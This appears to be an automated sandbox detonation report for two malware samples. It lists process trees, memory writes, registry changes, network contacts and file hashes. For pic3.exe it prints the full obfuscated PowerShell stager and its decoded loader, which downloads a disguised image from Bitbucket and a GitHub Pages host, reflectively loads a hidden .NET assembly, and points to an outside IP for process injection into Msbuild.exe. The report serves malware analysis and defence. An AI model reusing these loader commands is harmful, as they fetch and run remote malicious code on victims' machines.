Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe
PID 2076 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2076 -s 500

Network

Country Destination Domain Proto
US 8.8.8.8:53 fearleszsjourney.tech udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp

Files

memory/2076-0-0x00000000741DE000-0x00000000741DF000-memory.dmp

memory/2076-1-0x0000000000AF0000-0x0000000000B4A000-memory.dmp

memory/2072-3-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-9-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-13-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2072-11-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-17-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-7-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-5-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2072-16-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2076-18-0x00000000741D0000-0x00000000748BE000-memory.dmp

memory/2072-19-0x0000000000400000-0x000000000045D000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar545E.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2072-57-0x0000000000400000-0x000000000045D000-memory.dmp

memory/2076-58-0x00000000741D0000-0x00000000748BE000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

127s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\SYSTEM32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1404 set thread context of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings C:\Windows\SYSTEM32\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 640 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe C:\Windows\SYSTEM32\cmd.exe
PID 3236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 3236 wrote to memory of 912 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WScript.exe
PID 912 wrote to memory of 3456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 912 wrote to memory of 3456 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 1404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3456 wrote to memory of 1404 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
PID 1404 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\pic3.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c 67bcef97a5ffe.vbs

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GY@ZwBo@Gg@a@Bo@Gg@a@Bo@C8@dgBk@GY@ZgBn@GQ@LwBk@G8@dwBu@Gw@bwBh@GQ@cw@v@HQ@ZQBz@HQ@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@g@D0@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@FM@dQBi@HM@d@By@Gk@bgBn@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Cw@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@HQ@ZQB4@HQ@I@@9@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@Ow@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBn@Gs@ZgBt@GE@agBy@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/fghhhhhhh/vdffgd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gkfmajr/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 ofice365.github.io udp
US 185.199.109.153:443 ofice365.github.io tcp
DE 62.60.226.112:80 62.60.226.112 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67bcef97a5ffe.vbs

MD5 e8b52173ea80a3b35b476222cef45835
SHA1 492bbd503f6ac03375104e5e0ec16095117732da
SHA256 15b1f23eff2c505506e6b434806d2ee0b22a6b7bade8e6760225cc36f1e4af06
SHA512 814a971f4dd36d5983dd768560032701fd5c0b19eda5d88beb5079793f4b6eb02cdfb52f2ac90a1d5293b1b2e421e09e98e5ae78150bffc4f577a65e059fbc10

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o5kokdt4.mdo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3456-9-0x000002B762500000-0x000002B762522000-memory.dmp

memory/1404-23-0x0000025A3A720000-0x0000025A3A738000-memory.dmp

memory/2988-24-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2988-27-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f41839a3fe2888c8b3050197bc9a0a05
